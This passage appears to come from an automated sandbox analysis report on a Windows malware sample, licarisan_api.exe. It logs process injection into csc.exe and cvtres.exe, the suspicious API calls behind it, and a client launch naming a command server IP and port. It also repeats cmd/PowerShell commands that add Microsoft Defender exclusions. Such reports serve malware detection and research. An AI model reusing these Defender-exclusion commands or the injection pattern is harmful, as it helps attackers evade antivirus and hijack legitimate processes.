                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596593Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596374Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596264Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596155Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595827Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595598Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595463Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594788Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594341Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594233Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594118Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594012Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593905Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593683Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593577Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593356Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593138Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 592921Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 592812Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: cvtres.exe, 0000000C.00000002.2504548519.0000000001166000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\licarisan_api.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara match | File source: Process Memory Space: csc.exe PID: 7584, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: cvtres.exe PID: 7640, type: MEMORYSTR
                  Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, YGRKZZ70EYH6.cs | Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                  Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, YGRKZZ70EYH6.cs | Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                  Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, 2A4ZY3PGYZLX.cs | Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
                  Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, 2A4ZY3PGYZLX.cs | Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64)
                  Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, 2A4ZY3PGYZLX.cs | Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, data, bufferSize, ref bytesRead)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 5220000 protect: page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 protect: page execute and read and write
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 5220000 value starts with: 4D5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 5220000
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4FCD008
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 402000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 420000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 422000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: C99008
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 193.142.146.64 8880 vUiuCXqqM
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
                  Source: csc.exe, 0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
